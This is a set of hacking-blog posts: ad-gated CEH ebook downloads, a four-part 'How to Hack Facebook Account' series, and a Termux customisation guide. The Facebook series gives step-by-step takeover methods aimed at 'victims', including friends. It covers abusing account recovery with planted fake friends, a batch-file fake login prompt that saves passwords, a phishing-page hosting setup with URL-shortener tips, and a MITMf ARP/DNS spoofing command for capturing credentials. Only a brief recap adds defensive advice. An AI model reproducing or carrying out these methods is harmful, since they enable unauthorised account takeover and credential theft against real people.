Back to Top
Hello Friends, Today I'm gonna share with you a brand new version of Critical Ethical Hacking CEH V9 with tool's... Absolutely FREE...😍


What is Certified Ethical Hacker (CEH)?

It is a qualification obtained by demonstrating knowledge of assessing the security of computer systems by looking for weaknesses and vulnerabilities in target systems, using the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system. 

This knowledge is assessed by answering multiple choice questions regarding various ethical hacking techniques and tools. The code for the C|EH exam is 312-50. 

This certification has now been made a baseline with a progression to the C|EH (Practical), launched in March 2019, a test of penetration testing skills in a lab environment where the candidate must demonstrate the ability to apply techniques and use penetration testing tools to compromise various simulated systems within a virtual environment.

This is a PDF collection of CEH | V9. Read to learn How to Hack and become beginner to expert in Hacking. Check Hacking section for more Tutorials and Ebook For more Ebook download.

How to learn? 

Step 1: Click here, to open the link. This link will take you to gestyy.com site.
Step 2: Click on Accept or Deny if asked. Wait for 5 Seconds & Click on SKIP AD.
Step 3: Now click on the links to download the learning and the tools file and open it.
Step 4: Enjoy Learning...😊

Critical Ethical Hacking V8 is also available, Click here to visit.

Critical Ethical Hacking V10 is also available, Click here to visit.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.
Hello Friends, Today I'm gonna share with you a brand new version of Critical Ethical Hacking CEH V10 with tool's... Absolutely FREE...😍


What is Certified Ethical Hacker (CEH)?

CEH or Certified Ethical Hacker is a skilled professional who understands and knows how to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system(s). The CEH credential certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective.
This is the worlds most advanced certified ethical hacking course with 20 of the most current security domains any individual will ever want to know when they are planning to beef up the information security posture of their organization. In 20 comprehensive modules, the course covers 340 attack technologies, commonly used by hackers.
This is a PDF collection of CEH | V10. Read to learn How to Hack and become beginner to expert in Hacking. Check Hacking section for more Tutorials and Ebook For more Ebook download.

What’s new in the CEH v10?

EC-Council has announced the CEH v10 – the tenth edition of the popular Certified Ethical Hacker certification.
Unveiled amongst other huge updates at the Scaling the unscalable mountain of cyber capability webinar, CEH v10 marks a new chapter for the certification as it aims to maintain its status as the world’s top ethical hacking certification.
The CEH dates back to 2003 and has been updated regularly to embrace evolving technologies. As a reminder, the CEH certification was last updated in 2015, with the launch of the CEH v9. This update increased the number of modules to 18 and introduced a greater focus on cloud computing.
Alongside other EC-Council partners, Firebrand attended the announcement webinar to give our students their first look at these important updates.
The worlds most advanced ethical hacking course with 20 of the most current security domains an ethical hacker will want to know when planning to beef up the information security posture of their organization.

How to learn?

Step 1: Click here, to open the link. This link will take you to gestyy.com site.
Step 2: Click on Accept or Deny if asked. Wait for 5 Seconds & Click on SKIP AD.
Step 3: Now click on the links to download the learning and the tools file and open it.
Step 4: Enjoy Learning...😊

Critical Ethical Hacking V8 is also available, Click here to visit.

Critical Ethical Hacking V9 is also available, Click here to visit.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.

Hey Learner's, Today I'm gonna post an article about How to Hack Facebook Account using One of Four Methods i.e. By Facebook Password Forgot/Reset Method...


Steps to follow:

Step 1: Go to Facebook.com and click on Forgot Password link. You will be directed to page as show below.


Step 2: Now you are supposed to enter the email of the vicitm, or else you can enter the Facebook profile name. Facebook will search for the partiticular profile name you have entered and you will be shown the account. Click on “This is my account”.


Step 3: You will be directed to the next page. On the next page click on “No longer have access to these”.


Step 4: Now you will be asked for email address. Enter the email address there and click on “Submit”.


Step 5: Now Facebook will ask you to give answer for the Security  question. Not a problem, just enter the answers what ever you want for 3 times.

You will be directed to the page as shown below...



Step 6: Here goes the main part of hacking. After you Click Continue, Facebook will ask you to select the 3 Friends.

You are supposed to do smart work here. You have to create 3 fake accounts previously in the Friends list of victim.

Select those 3 Fake accounts.Facebook will send security codes to these Fake accounts( which you have created previously).

Now enter the 3 security codes. Facebook will send Password Recovery Email at your email that you have entered in Step-4. Now you can easily change the password of your Friends account.

Finally you are successfully done with hacking the Facebook account of your Friend.

Note: The victim will be emailed about the change of password through email. Hence, this method of hacking Facebook account will be success full only for  those victims who doesn’t check emails regularly.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.
Hey Learner's, Today I'm gonna post an article about How to Hack Facebook Account using Two of Four Methods i.e. By Keylogger Method...


What is Keyloggers?

Well, Keylogger is easy to pronounce but hard to develop. Basically this word comprises its strength with its keystrokes using my client or counts the activity such as login credentials, credit card numbers and many more. Keystroke logging often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. 
Keylogger software typically stores your keystrokes in a small file, which is either accessed later or automatically emailed to the person monitoring your actions. There are various software companies that provides Keylogger Software Bt in this post, I am going to tell you to set up your personal keylogger and its working.

Steps to follow:

Step 1: First of all, you need to open your notepad using Win+R and type Notepad in the run section.


Step 2: Now here paste the code given below in your notepad file. It’s a very short code of just 18 lines where several functions and actions were pronounced.

@echo off
color a
title Facebook Hacking :Login:
: start
cd “C:\”
md TechXtra
cls
echo Please Enter Your Facebook Email Address And Password
echo.
echo.
cd “C:\TechXtra”
set /p user=Email ID:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%”>Hacked.txt
echo.
echo.
echo Press any key to continue
pause >

Step 3: Now you need to save this file using .bat extension. Because it is a command prompt file that creates a folder using the name of TechXtra in your C Drive. Where all your passwords, emails were saved.


Step 4: Now execute the file as a test for your confirmation and see the results.

How to view the hacked passwords?

Step 1: Open my ComputerC DriveTechXtra folder.

Step 2: There is a text file that includes all hacked passwords with their email of facebook.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.
Hey Learner's, Today I'm gonna post an article about How to Hack Facebook Account using Three of Four Methods i.e. By Phishing Method...


What is Phishing?

The phishing attack is the method by which we create exactly the same page as the original(Facebook in my case) and send the link of the Fake webpage to the victim.
As the victim clicks on that link, then we receive the username and password of the victim in text format. So in this tutorial, I’m going to explain the step by step process to create a phishing attack for the Facebook.

Requirements:

index.html Mobile Version code(download here)
hack.php code(download here)
index.html Desktop version code(download here)
Free hosting (see below)

How to get free hosting?


Steps to follow:

Step 1: Visit 000webhost and click on SignUp for FREE 

Step 2: Now register using your Email id, set a password and select a Website name

Step 3: it’s very important to Verify the Email sent to your registered Email id(Verify email First)

Step 4: After verification of your Email Address, click on File manager and then Click on Upload files Now as


Step 5: Now you will be redirected to the File Manager of your website

Step 6: Go to the public_html Folder, upload both the files index.html and hack.php

Step 7: Click on upload in the Right corner of the File Manager to begin the uploading Process as


Step 8: Then select your both the files index.html and hack.php and click on the upload button as


Step 9: When the uploading process is completed, then login with Email id and password to 000webhost

Step 10: Navigate to Website list and copy your Website link address as


Pro tip: when you are trying to send phishing link to the victim, then use any URL shortener to increase the success rate. As per my experience, use bitly to shrink your URL

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.
Hey Learner's, Today I'm gonna post an article about How to Hack Facebook Account using Four of Four Methods i.e. By Man In The Middle Attack...

What is Man In The Middle Attack?

In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.
For performing this attack in Kali Linux we have a MITM framework which we have to install in Kali Linux.

MITMF : Mitmf stands for man in the middle attack framework.MITM framework provide an all Man-In-The-Middle and network attacks tools at one place. With these tools we can do lots of stuff like sniffing, spoofing, traffic interception, payload, injection etc.

There are 2 ways to install MITMF in Kali Linux:

  • Terminal
  • Browser

To install mitmf using terminal?

git clone
Or

apt-get install mitmf

How to install MITMF using Browser?

First visit below website link:
http://github.com/byt3bl33d3r/MITMf

Then click on Clone or download button and click on download zip.

Things we can do with mitmf:

  • injecting
  • payload
  • HTML payload
  • spoofing
  • proxy
  • ARP spoofing
  • DHCP spoofing
  • DNS spoofing
Here in this practicle, we will learn how to use this mitm framework to do the attack in the victim's machine. And using this attack we will grab the credentials of victims in clear text.

**Here we will get the username and password of the victim facebook account**

To perform the attack type:
Command: mitmf — arp — dns — spoof — gateway (default gateway ip ) — target(ip address ) –I eth0
In this command, we are performing arp spoofing, DNSspoofing and forcing the target to use our default gateway to get to the internet.

In target machine victim is trying to open facebook.

Here in:
Username: xxxxx@gmail.com
Password: 123456

As soon as the victim will click on the login button. The attacker will get the credentials (plain text )in his screen.


This is how we can perform a man in the middle attack using Kali Linux.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.
Hey Folks, Wassup, Today In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you. Click on the link of method name's to learn...


-:Method 1:-

  • The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.
  • The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
  • Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
  • It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
  • It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
  • It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
  • If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself?

  • Use an email address specifically for your Facebook and don't put that email address on your profile.
  • When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries — not even third grade teacher's names. It's as easy as looking through a yearbook.
  • Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

-:Method 2:-


Use a Keylogger(Software)

A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.


Use a Keylogger(Hardware)

These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data.

There are several options available for hardware keyloggers. Wired keyloggers like the Keyllama can be attached to the victim's computer to save keystrokes and works on any operating system — provided you have physical access to retrieve the device later. If you're looking to swipe the passwords remotely, you can invest in a premium Wi-Fi enabled keylogger which can email captured keystrokes or be accessed remotely over Wi-Fi.


How to Protect Yourself?

  • Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
  • Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
  • Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
  • Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.


-:Method 3:-


This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.


How to Protect Yourself?

  • Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. If you're still doubtful, go directly to the main website and login the way you usually do.
  • Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
  • Use anti-virus & web security software, like Norton or McAfee.


-:Method 4:-


If you can get close to your target, you can trick them into connecting to a fake Wi-Fi network to steal credentials via a Man In The Middle (MITM) attack. Tools like the Wi-Fi Pumpkin make creating a fake Wi-Fi network is as easy as sticking a $16 Wireless Network Adapter on the $35 Raspberry Pi and getting close to your target. Once the victim connects to your fake network, you can inspect the traffic or route them to fake login pages. You can even set it to only replace certain pages and leave other pages alone.


How to Protect Yourself?

  • Don't connect to any open (unencrypted) Wi-Fi Networks.
  • Especially don't connect to any Wi-Fi networks that are out of place. Why might you see a "Google Starbucks" when there's no Starbucks for miles? Because hackers know your phone or computer will automatically connect to it if you have used a network with the same name before.
  • If you have trouble connecting to your Wi-Fi, look at your list of nearby networks to see if there are any copies of your network name nearby.
  • If your router asks you to enter the password for a firmware update to enable the internet or shows you a page with major spelling or grammar errors, it is likely you're connected to a fake hotspot and someone nearby is trying to steal your credentials.

NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.

How to customise Termux tool | Changing Font style, color, figlet name etc | TechXtra

Hey guys, welcome back to your one only favourite blog... Today I'm gonna post an article about how to customise Termux tool in easy way.



What is customization?
Customization is a modification made to a product or service to suit a specific purpose. There is a difference between customerization and customization. A company can customize products to fit a customer's specifications. In this case, the company creates the product value. But, customerization results in a co-created value. In a customerization strategy both the company and the consumer contribute to the resulting product value.

The customisation of Termux tool depends on following manner:
  1. Removing Welcome Screen
  2. Insert ANCII text of your Nick Name
  3. Font Style & Color of Termux Terminal
Let's get started...

Removing Welcome Screen:


Step 1: Open Termux Tool & Enter the following commands one by one.

Step 2: Commands are as follows:


cd ..
ls
cd usr/etc
ls
rm -rf motd
Step 3:  Now exit the Termux tool and restart it again... It's Done!!!


Insert ANCII of your Nick Name:
Step 1: Open Termux Tool & Enter the following commands one by one.

Step 2: Commands are as follows:
pkg install figlet
pkg install nano
Step 3:  Now again restart the Termux tool and type the following commands.
cd ..
ls
cd usr
ls
cd etc
ls
nano bash.bashrc
Step 4: After doing all this, you will see the following screen.



In this screen, you have to edit some command. Type the following command after } bracket.
figlet -f standard darkwiki
Step 5: It's Done!!!



Font Style & Color of Termux Terminal:
Step 1: Open Termux Terminal in you device & Enter the following commands one by one.

The apt update command is used to update your Termux Terminal to its newest version. The apt upgrade tool will upgrade the pre-installed tool of your Termux Terminal. The clear command will clear all the installation and updation or everything that is printed on your Termux Terminal and give you a clean and new screen to start your process. The apt install curl command is used to install the curl package and to proceed further in the installation of customisation tool.

Step 2: Commands are as follows:
apt update
apt upgrade
clear
apt install curl -
sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"
Step 3: Now type 0 and restart the Termux tool. Typing 0 will take the default theme of the Termux Customization tool. That's why I recommend you to do the check it by typing other numbers and trying or experiencing other theme.



In order you have to change color, Type following command:
~/.termux/colors.sh
In order you have to change font, Type following command:
~/.termux/fonts.sh

**If you are able to see the interface given above in the picture that means you are all done with installation part and ready for using it.**
That's all for now guys,

hotsky (TechXtra)


Signing off...😊


NOTE: This post is only for educational purpose, any misuse done by your side, TechXtra & The respective Author will not be responsible.